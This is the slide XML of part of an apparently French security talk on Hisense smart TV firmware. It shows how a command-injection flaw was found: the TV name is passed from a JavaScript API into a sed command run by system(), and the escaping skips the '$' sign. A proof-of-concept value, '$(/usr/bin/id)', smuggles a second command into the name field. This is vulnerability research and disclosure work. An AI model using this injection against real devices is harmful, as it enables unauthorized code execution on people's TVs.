          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FIND ANOTHER VULNERABILITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E492408-0C91-55F1-C7CA-458FEB8A75CF}"/>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20" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E11E5C7-DF1A-514E-3C11-15B0AC93E21E}"/>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25610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5E63A11-8B9B-10C4-F0DC-22981EED2E9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BE45F0-3793-A573-D619-39B9016424BB}"/>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ACDB0D0E-A743-BA25-48B6-E934DB6795D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A07B2FDF-AE54-3740-3BBF-368C36529A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1202363"/>
            <a:ext cx="8509659" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rechercher les appels à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>=&gt; 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>xrefs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> dans le binaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>tvmain</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57F51E2-36EB-7ADA-FCFB-68D3FF8D9C3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3615883" y="3111562"/>
            <a:ext cx="5066425" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>hs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>AppRemoteMonitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>SysTvNameObserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>notifyNewValue</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA6D4CA-5713-157F-BC93-CE0E284C6C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345484" y="1712020"/>
            <a:ext cx="2550440" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de.loewe.str.system.machinename</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="ZoneTexte 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EEB042E-501B-4400-6A39-7F839A3F9D77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4913823" y="2866919"/>
            <a:ext cx="2731448" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de.loewe.str.system.machinename</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="ZoneTexte 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2944CF9-C743-AF8C-A830-D0BA9DD81768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1482543"/>
            <a:ext cx="3824347" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>cobalt::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>hisense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>modeljs_dvb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>::System::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>SetMachinename</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBE7C32-4094-5704-4648-25254C11489E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792612" y="2033183"/>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hisenseUI</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59FEB3DB-188E-CAAE-28DB-8A5221B1A8A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5321004" y="2033183"/>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tvmain</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="ZoneTexte 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4772CD6C-2732-6F12-F161-038BD2D08B24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556808" y="1919075"/>
            <a:ext cx="1656183" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>IPC </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ja-JP" dirty="0"/>
              <a:t>¯\_(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="fr-FR" dirty="0"/>
              <a:t>ツ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ja-JP" dirty="0"/>
              <a:t>)_/¯</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Connecteur droit avec flèche 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A21EE62-BE69-ABD4-8FAB-E4A63273827E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448796" y="2465231"/>
            <a:ext cx="18722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0A5DFE3-5605-BFCC-9A88-41A7BEC3ADC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="3664224"/>
            <a:ext cx="8413749" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>j_sprintf_0</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cmd</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a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -i \"s/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FriendlyName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[^\\r\\n]*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FriendlyName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = %s/\" /Customer/model_info.ini"</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r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvname</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br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>j_system</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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A918A6A6-30C1-0C2C-7598-02DA3DB3D84F}"/>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25" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD5AC5B6-46DC-81F7-D297-6498A0E88A02}"/>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Vulnérabilités</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2784026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37D7E94-653A-31A3-C758-64E84D61A69B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB77EE10-DC5A-FDB3-859D-27380EB9A879}"/>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10312FE8-C3B4-F5B2-E437-A1D737EB0930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A077BC-E3F7-C9F9-5472-CC661E923740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="1202363"/>
            <a:ext cx="8509659" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Quelques échappements sur les caractères \ et “  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>sauf $</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36CE8721-F50E-A77F-DF8F-F9CA7028981E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643352" y="1668270"/>
            <a:ext cx="6123353" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</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modeljs</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system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00008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setMachinename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"$(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/id)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00008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endParaRPr lang="fr-FR" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B96AD7-BF1C-4A9F-468A-1D15A71D2C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="2202418"/>
            <a:ext cx="3546140" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Customer/model_info.ini</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D56F16D-08A5-46E4-F108-FE368FE8F382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365125" y="2624817"/>
            <a:ext cx="8413749" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[Model]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Name = "50A6500EE"# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
